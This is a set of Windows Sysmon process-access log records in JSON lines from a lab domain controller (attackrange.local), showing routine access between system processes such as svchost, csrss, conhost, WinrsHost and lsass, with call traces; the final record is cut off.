{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8333,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.637\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.637","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8334,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.637\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.637","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8335,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.637\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.637","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8336,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.637\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.637","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8337,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.637\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-050E-5F25-0000-00104C091300}\r\nTargetProcessId: 752\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.637","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-050E-5F25-0000-00104C091300}","TargetProcessId":"752","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8338,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.637\r\nSourceProcessGUID: {A837DB8D-050E-5F25-0000-00104C091300}\r\nSourceProcessId: 752\r\nSourceThreadId: 4348\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0527-5F25-0000-001049C41300}\r\nTargetProcessId: 4680\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.637","SourceProcessGUID":"{A837DB8D-050E-5F25-0000-00104C091300}","SourceProcessId":"752","SourceThreadId":"4348","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0527-5F25-0000-001049C41300}","TargetProcessId":"4680","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8339,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.653\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0527-5F25-0000-001049C41300}\r\nTargetProcessId: 4680\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.653","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0527-5F25-0000-001049C41300}","TargetProcessId":"4680","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8340,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.653\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nSourceProcessId: 1332\r\nSourceThreadId: 1792\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0527-5F25-0000-001049C41300}\r\nTargetProcessId: 4680\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.653","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","SourceProcessId":"1332","SourceThreadId":"1792","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0527-5F25-0000-001049C41300}","TargetProcessId":"4680","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8341,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.669\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 